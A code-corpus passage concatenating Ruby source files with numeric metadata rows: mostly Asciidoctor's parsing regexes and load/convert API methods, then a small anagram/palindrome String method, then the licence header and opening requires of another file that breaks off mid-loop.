# <1> <2> (multiple callouts on one line)
# <!--1--> (for XML-based languages)
# <.> (auto-numbered)
#
# NOTE extract regexps are applied line-by-line, so we can use $ as end-of-line char
CalloutExtractRx = %r(((?://|#|--|;;) ?)?(\\)?<!?(|--)(\d+|\.)\3>(?=(?: ?\\?<!?\3(?:\d+|\.)\3>)*$))
CalloutExtractRxt = '(\\\\)?<()(\\d+|\\.)>(?=(?: ?\\\\?<(?:\\d+|\\.)>)*$)'
CalloutExtractRxMap = ::Hash.new {|h, k| h[k] = /(#{k.empty? ? '' : "#{::Regexp.escape k} ?"})?#{CalloutExtractRxt}/ }
# NOTE special characters have not been replaced when scanning
CalloutScanRx = /\\?<!?(|--)(\d+|\.)\1>(?=(?: ?\\?<!?\1(?:\d+|\.)\1>)*#{CC_EOL})/
# NOTE special characters have already been replaced when converting to an SGML format
CalloutSourceRx = %r(((?://|#|--|;;) ?)?(\\)?<!?(|--)(\d+|\.)\3>(?=(?: ?\\?<!?\3(?:\d+|\.)\3>)*#{CC_EOL}))
CalloutSourceRxt = "(\\\\)?<()(\\d+|\\.)>(?=(?: ?\\\\?<(?:\\d+|\\.)>)*#{CC_EOL})"
CalloutSourceRxMap = ::Hash.new {|h, k| h[k] = /(#{k.empty? ? '' : "#{::Regexp.escape k} ?"})?#{CalloutSourceRxt}/ }
# A Hash of regexps for lists used for dynamic access.
ListRxMap = {
ulist: UnorderedListRx,
olist: OrderedListRx,
dlist: DescriptionListRx,
colist: CalloutListRx,
}
## Tables
# Parses the column spec (i.e., colspec) for a table.
#
# Examples
#
# 1*h,2*,^3e
#
ColumnSpecRx = /^(?:(\d+)\*)?([<^>](?:\.[<^>]?)?|(?:[<^>]?\.)?[<^>])?(\d+%?|~)?([a-z])?$/
# Parses the start and end of a cell spec (i.e., cellspec) for a table.
#
# Examples
#
# 2.3+<.>m
#
# FIXME use step-wise scan (or treetop) rather than this mega-regexp
CellSpecStartRx = /^[ \t]*(?:(\d+(?:\.\d*)?|(?:\d*\.)?\d+)([*+]))?([<^>](?:\.[<^>]?)?|(?:[<^>]?\.)?[<^>])?([a-z])?$/
CellSpecEndRx = /[ \t]+(?:(\d+(?:\.\d*)?|(?:\d*\.)?\d+)([*+]))?([<^>](?:\.[<^>]?)?|(?:[<^>]?\.)?[<^>])?([a-z])?$/
# Block macros
# Matches the custom block macro pattern.
#
# Examples
#
# gist::123456[]
#
#--
# NOTE we've relaxed the match for target to accomodate the short format (e.g., name::[attrlist])
CustomBlockMacroRx = /^(#{CG_WORD}[-#{CC_WORD}]*)::(|\S|\S#{CC_ANY}*?\S)\[(#{CC_ANY}+)?\]$/
# Matches an image, video or audio block macro.
#
# Examples
#
# image::filename.png[Caption]
# video::http://youtube.com/12345[Cats vs Dogs]
#
BlockMediaMacroRx = /^(image|video|audio)::(\S|\S#{CC_ANY}*?\S)\[(#{CC_ANY}+)?\]$/
# Matches the TOC block macro.
#
# Examples
#
# toc::[]
# toc::[levels=2]
#
BlockTocMacroRx = /^toc::\[(#{CC_ANY}+)?\]$/
## Inline macros
# Matches an anchor (i.e., id + optional reference text) in the flow of text.
#
# Examples
#
# [[idname]]
# [[idname,Reference Text]]
# anchor:idname[]
# anchor:idname[Reference Text]
#
InlineAnchorRx = /(\\)?(?:\[\[([#{CC_ALPHA}_:][#{CC_WORD}:.-]*)(?:, *(#{CC_ANY}+?))?\]\]|anchor:([#{CC_ALPHA}_:][#{CC_WORD}:.-]*)\[(?:\]|(#{CC_ANY}*?[^\\])\]))/
# Scans for a non-escaped anchor (i.e., id + optional reference text) in the flow of text.
InlineAnchorScanRx = /(?:^|[^\\\[])\[\[([#{CC_ALPHA}_:][#{CC_WORD}:.-]*)(?:, *(#{CC_ANY}+?))?\]\]|(?:^|[^\\])anchor:([#{CC_ALPHA}_:][#{CC_WORD}:.-]*)\[(?:\]|(#{CC_ANY}*?[^\\])\])/
# Scans for a leading, non-escaped anchor (i.e., id + optional reference text).
LeadingInlineAnchorRx = /^\[\[([#{CC_ALPHA}_:][#{CC_WORD}:.-]*)(?:, *(#{CC_ANY}+?))?\]\]/
# Matches a bibliography anchor at the start of the list item text (in a bibliography list).
#
# Examples
#
# [[[Fowler_1997]]] Fowler M. ...
#
InlineBiblioAnchorRx = /^\[\[\[([#{CC_ALPHA}_:][#{CC_WORD}:.-]*)(?:, *(#{CC_ANY}+?))?\]\]\]/
# Matches an inline e-mail address.
#
# [email protected]
#
InlineEmailRx = %r(([\\>:/])?#{CG_WORD}(?:&|[#{CC_WORD}.%+-])*@#{CG_ALNUM}[#{CC_ALNUM}.-]*\.#{CG_ALPHA}{2,4}\b)
# Matches an inline footnote macro, which is allowed to span multiple lines.
#
# Examples
# footnote:[text] (not referenceable)
# footnote:id[text] (referenceable)
# footnote:id[] (reference)
# footnoteref:[id,text] (legacy)
# footnoteref:[id] (legacy)
#
InlineFootnoteMacroRx = /\\?footnote(?:(ref):|:([\w-]+)?)\[(?:|(#{CC_ALL}*?[^\\]))\]/m
# Matches an image or icon inline macro.
#
# Examples
#
# image:filename.png[Alt Text]
# image:http://example.com/images/filename.png[Alt Text]
# image:filename.png[More [Alt\] Text] (alt text becomes "More [Alt] Text")
# icon:github[large]
#
# NOTE be as non-greedy as possible by not allowing newline or left square bracket in target
InlineImageMacroRx = /\\?i(?:mage|con):([^:\s\[](?:[^\n\[]*[^\s\[])?)\[(|#{CC_ALL}*?[^\\])\]/m
# Matches an indexterm inline macro, which may span multiple lines.
#
# Examples
#
# indexterm:[Tigers,Big cats]
# (((Tigers,Big cats)))
# indexterm2:[Tigers]
# ((Tigers))
#
InlineIndextermMacroRx = /\\?(?:(indexterm2?):\[(#{CC_ALL}*?[^\\])\]|\(\((#{CC_ALL}+?)\)\)(?!\)))/m
# Matches either the kbd or btn inline macro.
#
# Examples
#
# kbd:[F3]
# kbd:[Ctrl+Shift+T]
# kbd:[Ctrl+\]]
# kbd:[Ctrl,T]
# btn:[Save]
#
InlineKbdBtnMacroRx = /(\\)?(kbd|btn):\[(#{CC_ALL}*?[^\\])\]/m
# Matches an implicit link and some of the link inline macro.
#
# Examples
#
# https://github.com
# https://github.com[GitHub]
# <https://github.com>
# link:https://github.com[]
#
# FIXME revisit! the main issue is we need different rules for implicit vs explicit
InlineLinkRx = %r((^|link:|#{CG_BLANK}|<|[>\(\)\[\];])(\\?(?:https?|file|ftp|irc)://[^\s\[\]<]*[^\s.,\[\]<])(?:\[(|#{CC_ALL}*?[^\\])\])?)m
# Match a link or e-mail inline macro.
#
# Examples
#
# link:path[label]
# mailto:[email protected][]
#
# NOTE be as non-greedy as possible by not allowing space or left square bracket in target
InlineLinkMacroRx = /\\?(?:link|(mailto)):(|[^:\s\[][^\s\[]*)\[(|#{CC_ALL}*?[^\\])\]/m
# Matches the name of a macro.
#
MacroNameRx = /^#{CG_WORD}[-#{CC_WORD}]*$/
# Matches a stem (and alternatives, asciimath and latexmath) inline macro, which may span multiple lines.
#
# Examples
#
# stem:[x != 0]
# asciimath:[x != 0]
# latexmath:[\sqrt{4} = 2]
#
InlineStemMacroRx = /\\?(stem|(?:latex|ascii)math):([a-z]+(?:,[a-z]+)*)?\[(#{CC_ALL}*?[^\\])\]/m
# Matches a menu inline macro.
#
# Examples
#
# menu:File[Save As...]
# menu:View[Page Style > No Style]
# menu:View[Page Style, No Style]
#
InlineMenuMacroRx = /\\?menu:(#{CG_WORD}|[#{CC_WORD}&][^\n\[]*[^\s\[])\[ *(#{CC_ALL}*?[^\\])?\]/m
# Matches an implicit menu inline macro.
#
# Examples
#
# "File > New..."
#
InlineMenuRx = /\\?"([#{CC_WORD}&][^"]*?[ \n]+>[ \n]+[^"]*)"/
# Matches an inline passthrough, which may span multiple lines.
#
# Examples
#
# +text+
# `text` (compat)
#
# NOTE we always capture the attributes so we know when to use compatible (i.e., legacy) behavior
InlinePassRx = {
false => ['+', '`', /(^|[^#{CC_WORD};:])(?:\[([^\]]+)\])?(\\?(\+|`)(\S|\S#{CC_ALL}*?\S)\4)(?!#{CG_WORD})/m],
true => ['`', nil, /(^|[^`#{CC_WORD}])(?:\[([^\]]+)\])?(\\?(`)([^`\s]|[^`\s]#{CC_ALL}*?\S)\4)(?![`#{CC_WORD}])/m]
}
# Matches an inline plus passthrough spanning multiple lines, but only when it occurs directly
# inside constrained monospaced formatting in non-compat mode.
#
# Examples
#
# +text+
#
SinglePlusInlinePassRx = /^(\\)?\+(\S|\S#{CC_ALL}*?\S)\+$/m
# Matches several variants of the passthrough inline macro, which may span multiple lines.
#
# Examples
#
# +++text+++
# $$text$$
# pass:quotes[text]
#
# NOTE we have to support an empty pass:[] for compatibility with AsciiDoc Python
InlinePassMacroRx = /(?:(?:(\\?)\[([^\]]+)\])?(\\{0,2})(\+\+\+?|\$\$)(#{CC_ALL}*?)\4|(\\?)pass:([a-z]+(?:,[a-z]+)*)?\[(|#{CC_ALL}*?[^\\])\])/m
# Matches an xref (i.e., cross-reference) inline macro, which may span multiple lines.
#
# Examples
#
# <<id,reftext>>
# xref:id[reftext]
#
# NOTE special characters have already been escaped, hence the entity references
# NOTE { is included in start characters to support target that begins with attribute reference in title content
InlineXrefMacroRx = %r(\\?(?:<<([#{CC_WORD}#/.:{]#{CC_ALL}*?)>>|xref:([#{CC_WORD}#/.:{]#{CC_ALL}*?)\[(?:\]|(#{CC_ALL}*?[^\\])\])))m
## Layout
# Matches a trailing + preceded by at least one space character,
# which forces a hard line break (<br> tag in HTML output).
#
# NOTE AsciiDoc Python allows + to be preceded by TAB; Asciidoctor does not
#
# Examples
#
# Humpty Dumpty sat on a wall, +
# Humpty Dumpty had a great fall.
#
if RUBY_ENGINE == 'opal'
# NOTE In JavaScript, ^ and $ only match the start and end of line if the multiline flag is present
HardLineBreakRx = /^(#{CC_ANY}*) \+$/m
else
# NOTE In Ruby, ^ and $ always match start and end of line
HardLineBreakRx = /^(.*) \+$/
end
# Matches a Markdown horizontal rule.
#
# Examples
#
# --- or - - -
# *** or * * *
# ___ or _ _ _
#
MarkdownThematicBreakRx = /^ {0,3}([-*_])( *)\1\2\1$/
# Matches an AsciiDoc or Markdown horizontal rule or AsciiDoc page break.
#
# Examples
#
# ''' (horizontal rule)
# <<< (page break)
# --- or - - - (horizontal rule, Markdown)
# *** or * * * (horizontal rule, Markdown)
# ___ or _ _ _ (horizontal rule, Markdown)
#
ExtLayoutBreakRx = /^(?:'{3,}|<{3,}|([-*_])( *)\1\2\1)$/
## General
# Matches consecutive blank lines.
#
# Examples
#
# one
#
# two
#
BlankLineRx = /\n{2,}/
# Matches a comma or semi-colon delimiter.
#
# Examples
#
# one,two
# three;four
#
#DataDelimiterRx = /[,;]/
# Matches whitespace (space, tab, newline) escaped by a backslash.
#
# Examples
#
# three\ blind\ mice
#
EscapedSpaceRx = /\\([ \t\n])/
# Detects if text is a possible candidate for the replacements substitution.
#
ReplaceableTextRx = /[&']|--|\.\.\.|\([CRT]M?\)/
# Matches a whitespace delimiter, a sequence of spaces, tabs, and/or newlines.
# Matches the parsing rules of %w strings in Ruby.
#
# Examples
#
# one two three four
# five six
#
# TODO change to /(?<!\\)[ \t\n]+/ once lookbehind assertions are implemented in all modern browsers
SpaceDelimiterRx = /([^\\])[ \t\n]+/
# Matches a + or - modifier in a subs list
#
SubModifierSniffRx = /[+-]/
# Matches one or more consecutive digits at the end of a line.
#
# Examples
#
# docbook5
# html5
#
TrailingDigitsRx = /\d+$/
# Detects strings that resemble URIs.
#
# Examples
# http://domain
# https://domain
# file:///path
# data:info
#
# not c:/sample.adoc or c:\sample.adoc
#
UriSniffRx = %r(^#{CG_ALPHA}[#{CC_ALNUM}.+-]+:/{0,2})
# Detects the end of an implicit URI in the text
#
# Examples
#
# (http://google.com)
# >http://google.com<
# (See http://google.com):
#
UriTerminatorRx = /[);:]$/
# Detects XML tags
XmlSanitizeRx = /<[^>]+>/
#end
INTRINSIC_ATTRIBUTES = {
'startsb' => '[',
'endsb' => ']',
'vbar' => '|',
'caret' => '^',
'asterisk' => '*',
'tilde' => '~',
'plus' => '+',
'backslash' => '\\',
'backtick' => '`',
'blank' => '',
'empty' => '',
'sp' => ' ',
'two-colons' => '::',
'two-semicolons' => ';;',
'nbsp' => ' ',
'deg' => '°',
'zwsp' => '​',
'quot' => '"',
'apos' => ''',
'lsquo' => '‘',
'rsquo' => '’',
'ldquo' => '“',
'rdquo' => '”',
'wj' => '⁠',
'brvbar' => '¦',
'pp' => '++',
'cpp' => 'C++',
'amp' => '&',
'lt' => '<',
'gt' => '>'
}
# unconstrained quotes:: can appear anywhere
# constrained quotes:: must be bordered by non-word characters
# NOTE these substitutions are processed in the order they appear here and
# the order in which they are replaced is important
quote_subs = [
# **strong**
[:strong, :unconstrained, /\\?(?:\[([^\]]+)\])?\*\*(#{CC_ALL}+?)\*\*/m],
# *strong*
[:strong, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+)\])?\*(\S|\S#{CC_ALL}*?\S)\*(?!#{CG_WORD})/m],
# "`double-quoted`"
[:double, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+)\])?"`(\S|\S#{CC_ALL}*?\S)`"(?!#{CG_WORD})/m],
# '`single-quoted`'
[:single, :constrained, /(^|[^#{CC_WORD};:`}])(?:\[([^\]]+)\])?'`(\S|\S#{CC_ALL}*?\S)`'(?!#{CG_WORD})/m],
# ``monospaced``
[:monospaced, :unconstrained, /\\?(?:\[([^\]]+)\])?``(#{CC_ALL}+?)``/m],
# `monospaced`
[:monospaced, :constrained, /(^|[^#{CC_WORD};:"'`}])(?:\[([^\]]+)\])?`(\S|\S#{CC_ALL}*?\S)`(?![#{CC_WORD}"'`])/m],
# __emphasis__
[:emphasis, :unconstrained, /\\?(?:\[([^\]]+)\])?__(#{CC_ALL}+?)__/m],
# _emphasis_
[:emphasis, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+)\])?_(\S|\S#{CC_ALL}*?\S)_(?!#{CG_WORD})/m],
# ##mark## (referred to in AsciiDoc Python as unquoted)
[:mark, :unconstrained, /\\?(?:\[([^\]]+)\])?##(#{CC_ALL}+?)##/m],
# #mark# (referred to in AsciiDoc Python as unquoted)
[:mark, :constrained, /(^|[^#{CC_WORD}&;:}])(?:\[([^\]]+)\])?#(\S|\S#{CC_ALL}*?\S)#(?!#{CG_WORD})/m],
# ^superscript^
[:superscript, :unconstrained, /\\?(?:\[([^\]]+)\])?\^(\S+?)\^/],
# ~subscript~
[:subscript, :unconstrained, /\\?(?:\[([^\]]+)\])?~(\S+?)~/]
]
compat_quote_subs = quote_subs.drop 0
# ``quoted''
compat_quote_subs[2] = [:double, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+)\])?``(\S|\S#{CC_ALL}*?\S)''(?!#{CG_WORD})/m]
# `quoted'
compat_quote_subs[3] = [:single, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+)\])?`(\S|\S#{CC_ALL}*?\S)'(?!#{CG_WORD})/m]
# ++monospaced++
compat_quote_subs[4] = [:monospaced, :unconstrained, /\\?(?:\[([^\]]+)\])?\+\+(#{CC_ALL}+?)\+\+/m]
# +monospaced+
compat_quote_subs[5] = [:monospaced, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+)\])?\+(\S|\S#{CC_ALL}*?\S)\+(?!#{CG_WORD})/m]
# #unquoted#
#compat_quote_subs[8] = [:unquoted, *compat_quote_subs[8][1..-1]]
# ##unquoted##
#compat_quote_subs[9] = [:unquoted, *compat_quote_subs[9][1..-1]]
# 'emphasis'
compat_quote_subs.insert 3, [:emphasis, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+)\])?'(\S|\S#{CC_ALL}*?\S)'(?!#{CG_WORD})/m]
QUOTE_SUBS = {
false => quote_subs,
true => compat_quote_subs
}
quote_subs = nil
compat_quote_subs = nil
# NOTE order of replacements is significant
REPLACEMENTS = [
# (C)
[/\\?\(C\)/, '©', :none],
# (R)
[/\\?\(R\)/, '®', :none],
# (TM)
[/\\?\(TM\)/, '™', :none],
# foo -- bar (where either space character can be a newline)
# NOTE this necessarily drops the newline if it appears at end of line
[/(^|\n| |\\)--( |\n|$)/, ' — ', :none],
# foo--bar
[/(#{CG_WORD})\\?--(?=#{CG_WORD})/, '—​', :leading],
# ellipsis
[/\\?\.\.\./, '…​', :leading],
# right single quote
[/\\?`'/, '’', :none],
# apostrophe (inside a word)
[/(#{CG_ALNUM})\\?'(?=#{CG_ALPHA})/, '’', :leading],
# right arrow ->
[/\\?->/, '→', :none],
# right double arrow =>
[/\\?=>/, '⇒', :none],
# left arrow <-
[/\\?<-/, '←', :none],
# left double arrow <=
[/\\?<=/, '⇐', :none],
# restore entities
[/\\?(&)amp;((?:[a-zA-Z][a-zA-Z]+\d{0,2}|#\d\d\d{0,4}|#x[\da-fA-F][\da-fA-F][\da-fA-F]{0,3});)/, '', :bounding]
]
class << self
# Public: Parse the AsciiDoc source input into a {Document}
#
# Accepts input as an IO (or StringIO), String or String Array object. If the
# input is a File, the object is expected to be opened for reading and is not
# closed afterwards by this method. Information about the file (filename,
# directory name, etc) gets assigned to attributes on the Document object.
#
# input - the AsciiDoc source as a IO, String or Array.
# options - a String, Array or Hash of options to control processing (default: {})
# String and Array values are converted into a Hash.
# See {Document#initialize} for details about these options.
#
# Returns the Document
def load input, options = {}
options = options.dup
if (timings = options[:timings])
timings.start :read
end
if (logger = options[:logger]) && logger != LoggerManager.logger
LoggerManager.logger = logger
end
if !(attrs = options[:attributes])
attrs = {}
elsif ::Hash === attrs || ((defined? ::Java::JavaUtil::Map) && ::Java::JavaUtil::Map === attrs)
attrs = attrs.dup
elsif ::Array === attrs
attrs = {}.tap do |accum|
attrs.each do |entry|
k, _, v = entry.partition '='
accum[k] = v
end
end
elsif ::String === attrs
# condense and convert non-escaped spaces to null, unescape escaped spaces, then split on null
attrs = {}.tap do |accum|
attrs.gsub(SpaceDelimiterRx, '\1' + NULL).gsub(EscapedSpaceRx, '\1').split(NULL).each do |entry|
k, _, v = entry.partition '='
accum[k] = v
end
end
elsif (attrs.respond_to? :keys) && (attrs.respond_to? :[])
# coerce attrs to a real Hash
attrs = {}.tap {|accum| attrs.keys.each {|k| accum[k] = attrs[k] } }
else
raise ::ArgumentError, %(illegal type for attributes option: #{attrs.class.ancestors.join ' < '})
end
if ::File === input
options[:input_mtime] = input.mtime
# TODO cli checks if input path can be read and is file, but might want to add check to API too
input_path = ::File.absolute_path input.path
# NOTE defer setting infile and indir until we get a better sense of their purpose
attrs['docfile'] = input_path = ::File.absolute_path input.path
attrs['docdir'] = ::File.dirname input_path
attrs['docname'] = Helpers.basename input_path, (attrs['docfilesuffix'] = ::File.extname input_path)
source = input.read
elsif input.respond_to? :read
# NOTE tty, pipes & sockets can't be rewound, but can't be sniffed easily either
# just fail the rewind operation silently to handle all cases
input.rewind rescue nil
source = input.read
elsif ::String === input
source = input
elsif ::Array === input
source = input.drop 0
elsif input
raise ::ArgumentError, %(unsupported input type: #{input.class})
end
if timings
timings.record :read
timings.start :parse
end
options[:attributes] = attrs
doc = options[:parse] == false ? (Document.new source, options) : (Document.new source, options).parse
timings.record :parse if timings
doc
rescue => ex
begin
context = %(asciidoctor: FAILED: #{attrs['docfile'] || '<stdin>'}: Failed to load AsciiDoc document)
if ex.respond_to? :exception
# The original message must be explicitly preserved when wrapping a Ruby exception
wrapped_ex = ex.exception %(#{context} - #{ex.message})
# JRuby automatically sets backtrace; MRI did not until 2.6
wrapped_ex.set_backtrace ex.backtrace
else
# Likely a Java exception class
wrapped_ex = ex.class.new context, ex
wrapped_ex.stack_trace = ex.stack_trace
end
rescue
wrapped_ex = ex
end
raise wrapped_ex
end
# Public: Parse the contents of the AsciiDoc source file into an Asciidoctor::Document
#
# input - the String AsciiDoc source filename
# options - a String, Array or Hash of options to control processing (default: {})
# String and Array values are converted into a Hash.
# See Asciidoctor::Document#initialize for details about options.
#
# Returns the Asciidoctor::Document
def load_file filename, options = {}
::File.open(filename, FILE_READ_MODE) {|file| self.load file, options }
end
# Public: Parse the AsciiDoc source input into an Asciidoctor::Document and
# convert it to the specified backend format.
#
# Accepts input as an IO (or StringIO), String or String Array object. If the
# input is a File, the object is expected to be opened for reading and is not
# closed afterwards by this method. Information about the file (filename,
# directory name, etc) gets assigned to attributes on the Document object.
#
# If the :to_file option is true, and the input is a File, the output is
# written to a file adjacent to the input file, having an extension that
# corresponds to the backend format. Otherwise, if the :to_file option is
# specified, the file is written to that file. If :to_file is not an absolute
# path, it is resolved relative to :to_dir, if given, otherwise the
# Document#base_dir. If the target directory does not exist, it will not be
# created unless the :mkdirs option is set to true. If the file cannot be
# written because the target directory does not exist, or because it falls
# outside of the Document#base_dir in safe mode, an IOError is raised.
#
# If the output is going to be written to a file, the header and footer are
# included unless specified otherwise (writing to a file implies creating a
# standalone document). Otherwise, the header and footer are not included by
# default and the converted result is returned.
#
# input - the String AsciiDoc source filename
# options - a String, Array or Hash of options to control processing (default: {})
# String and Array values are converted into a Hash.
# See Asciidoctor::Document#initialize for details about options.
#
# Returns the Document object if the converted String is written to a
# file, otherwise the converted String
def convert input, options = {}
options = options.dup
options.delete(:parse)
to_file = options.delete(:to_file)
to_dir = options.delete(:to_dir)
mkdirs = options.delete(:mkdirs) || false
case to_file
when true, nil
write_to_same_dir = !to_dir && ::File === input
stream_output = false
write_to_target = to_dir
to_file = nil
when false
write_to_same_dir = false
stream_output = false
write_to_target = false
to_file = nil
when '/dev/null'
return self.load input, options
else
write_to_same_dir = false
write_to_target = (stream_output = to_file.respond_to? :write) ? false : (options[:to_file] = to_file)
end
unless options.key? :header_footer
options[:header_footer] = true if write_to_same_dir || write_to_target
end
# NOTE outfile may be controlled by document attributes, so resolve outfile after loading
if write_to_same_dir
input_path = ::File.absolute_path input.path
options[:to_dir] = (outdir = ::File.dirname input_path)
elsif write_to_target
if to_dir
if to_file
options[:to_dir] = ::File.dirname ::File.expand_path ::File.join to_dir, to_file
else
options[:to_dir] = ::File.expand_path to_dir
end
elsif to_file
options[:to_dir] = ::File.dirname ::File.expand_path to_file
end
end
# NOTE :to_dir is always set when outputting to a file
# NOTE :to_file option only passed if assigned an explicit path
doc = self.load input, options
if write_to_same_dir # write to file in same directory
outfile = ::File.join outdir, %(#{doc.attributes['docname']}#{doc.outfilesuffix})
if outfile == input_path
raise ::IOError, %(input file and output file cannot be the same: #{outfile})
end
elsif write_to_target # write to explicit file or directory
working_dir = (options.key? :base_dir) ? (::File.expand_path options[:base_dir]) : ::Dir.pwd
# QUESTION should the jail be the working_dir or doc.base_dir???
jail = doc.safe >= SafeMode::SAFE ? working_dir : nil
if to_dir
outdir = doc.normalize_system_path(to_dir, working_dir, jail, target_name: 'to_dir', recover: false)
if to_file
outfile = doc.normalize_system_path(to_file, outdir, nil, target_name: 'to_dir', recover: false)
# reestablish outdir as the final target directory (in the case to_file had directory segments)
outdir = ::File.dirname outfile
else
outfile = ::File.join outdir, %(#{doc.attributes['docname']}#{doc.outfilesuffix})
end
elsif to_file
outfile = doc.normalize_system_path(to_file, working_dir, jail, target_name: 'to_dir', recover: false)
# establish outdir as the final target directory (in the case to_file had directory segments)
outdir = ::File.dirname outfile
end
if ::File === input && outfile == (::File.absolute_path input.path)
raise ::IOError, %(input file and output file cannot be the same: #{outfile})
end
if mkdirs
Helpers.mkdir_p outdir
else
# NOTE we intentionally refer to the directory as it was passed to the API
raise ::IOError, %(target directory does not exist: #{to_dir} (hint: set mkdirs option)) unless ::File.directory? outdir
end
else # write to stream
outfile = to_file
outdir = nil
end
opts = outfile && !stream_output ? { 'outfile' => outfile, 'outdir' => outdir } : {}
output = doc.convert opts
if outfile
doc.write output, outfile
# NOTE document cannot control this behavior if safe >= SafeMode::SERVER
# NOTE skip if stylesdir is a URI
if !stream_output && doc.safe < SafeMode::SECURE && (doc.attr? 'linkcss') && (doc.attr? 'copycss') &&
(doc.basebackend? 'html') && !((stylesdir = (doc.attr 'stylesdir')) && (Helpers.uriish? stylesdir))
if (stylesheet = doc.attr 'stylesheet')
if DEFAULT_STYLESHEET_KEYS.include? stylesheet
copy_asciidoctor_stylesheet = true
elsif !(Helpers.uriish? stylesheet)
copy_user_stylesheet = true
end
end
copy_syntax_hl_stylesheet = (syntax_hl = doc.syntax_highlighter) && (syntax_hl.write_stylesheet? doc)
if copy_asciidoctor_stylesheet || copy_user_stylesheet || copy_syntax_hl_stylesheet
stylesoutdir = doc.normalize_system_path(stylesdir, outdir, doc.safe >= SafeMode::SAFE ? outdir : nil)
if mkdirs
Helpers.mkdir_p stylesoutdir
else
raise ::IOError, %(target stylesheet directory does not exist: #{stylesoutdir} (hint: set mkdirs option)) unless ::File.directory? stylesoutdir
end
if copy_asciidoctor_stylesheet
Stylesheets.instance.write_primary_stylesheet stylesoutdir
# FIXME should Stylesheets also handle the user stylesheet?
elsif copy_user_stylesheet
if (stylesheet_src = doc.attr 'copycss').empty?
stylesheet_src = doc.normalize_system_path stylesheet
else
# NOTE in this case, copycss is a source location (but cannot be a URI)
stylesheet_src = doc.normalize_system_path stylesheet_src
end
stylesheet_dest = doc.normalize_system_path stylesheet, stylesoutdir, (doc.safe >= SafeMode::SAFE ? outdir : nil)
# NOTE don't warn if src can't be read and dest already exists (see #2323)
if stylesheet_src != stylesheet_dest && (stylesheet_data = doc.read_asset stylesheet_src,
warn_on_failure: !(::File.file? stylesheet_dest), label: 'stylesheet')
::File.write stylesheet_dest, stylesheet_data, mode: FILE_WRITE_MODE
end
end
syntax_hl.write_stylesheet doc, stylesoutdir if copy_syntax_hl_stylesheet
end
end
doc
else
output
end
end
# Alias render to convert to maintain backwards compatibility
alias render convert
# Public: Parse the contents of the AsciiDoc source file into an
# Asciidoctor::Document and convert it to the specified backend format.
#
# input - the String AsciiDoc source filename
# options - a String, Array or Hash of options to control processing (default: {})
# String and Array values are converted into a Hash.
# See Asciidoctor::Document#initialize for details about options.
#
# Returns the Document object if the converted String is written to a
# file, otherwise the converted String
def convert_file filename, options = {}
::File.open(filename, FILE_READ_MODE) {|file| self.convert file, options }
end
# Alias render_file to convert_file to maintain backwards compatibility
alias render_file convert_file
# Internal: Automatically load the Asciidoctor::Extensions module.
#
# Requires the Asciidoctor::Extensions module if the name is :Extensions.
# Otherwise, delegates to the super method.
#
# This method provides the same functionality as using autoload on
# Asciidoctor::Extensions, except that the constant isn't recognized as
# defined prior to it being loaded.
#
# Returns the resolved constant, if resolved, otherwise nothing.
def const_missing name
if name == :Extensions
require_relative 'asciidoctor/extensions'
Extensions
else
super
end
end unless RUBY_ENGINE == 'opal'
end
unless RUBY_ENGINE == 'opal'
autoload :SyntaxHighlighter, %(#{LIB_DIR}/asciidoctor/syntax_highlighter)
autoload :Timings, %(#{LIB_DIR}/asciidoctor/timings)
end
end
# core extensions
require_relative 'asciidoctor/core_ext'
# modules and helpers
require_relative 'asciidoctor/helpers'
require_relative 'asciidoctor/logging'
require_relative 'asciidoctor/substitutors'
require_relative 'asciidoctor/version'
# abstract classes
require_relative 'asciidoctor/abstract_node'
require_relative 'asciidoctor/abstract_block'
# concrete classes
require_relative 'asciidoctor/attribute_list'
require_relative 'asciidoctor/block'
require_relative 'asciidoctor/callouts'
require_relative 'asciidoctor/converter'
require_relative 'asciidoctor/document'
require_relative 'asciidoctor/inline'
require_relative 'asciidoctor/list'
require_relative 'asciidoctor/parser'
require_relative 'asciidoctor/path_resolver'
require_relative 'asciidoctor/reader'
require_relative 'asciidoctor/section'
require_relative 'asciidoctor/stylesheets'
require_relative 'asciidoctor/table'
require_relative 'asciidoctor/writer'
if RUBY_ENGINE == 'opal'
require_relative 'asciidoctor/syntax_highlighter'
require_relative 'asciidoctor/timings'
# this require is satisfied by the Asciidoctor.js build; it supplies compile and runtime overrides for Asciidoctor.js
require 'asciidoctor/js/postscript'
end
| 34.518148 | 183 | 0.593129 |
62bc348bfb0b769fc9c4869fa47aa23318653311 | 624 | class String
define_method(:anagram) do |word|
sorted_input = self.downcase().delete("^a-z").split('').sort()
sorted_word = word.downcase().delete("^a-z").split('').sort()
reversed_word = word.downcase().delete("^a-z").reverse()
user_input = self.downcase().delete("^a-z")
if user_input.scan(/[aeiouy]/).count <1
"not a real word"
elsif (sorted_word & sorted_input).empty?
"antigram!"
elsif user_input.downcase == reversed_word
"palindromes!"
elsif sorted_input == sorted_word
"anagrams!"
else
"not an anagram, palindrome, or antigram"
end
end
end
| 29.714286 | 66 | 0.636218 |
620b1f6dc37111a41d4bc8315d84c9070fc6e689 | 2,120 | #--
# Copyright (c) 2010-2012 Michael Berkovich
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#++
require 'rails'
require 'pp'
[
".",
"./containers"
].each do |dir|
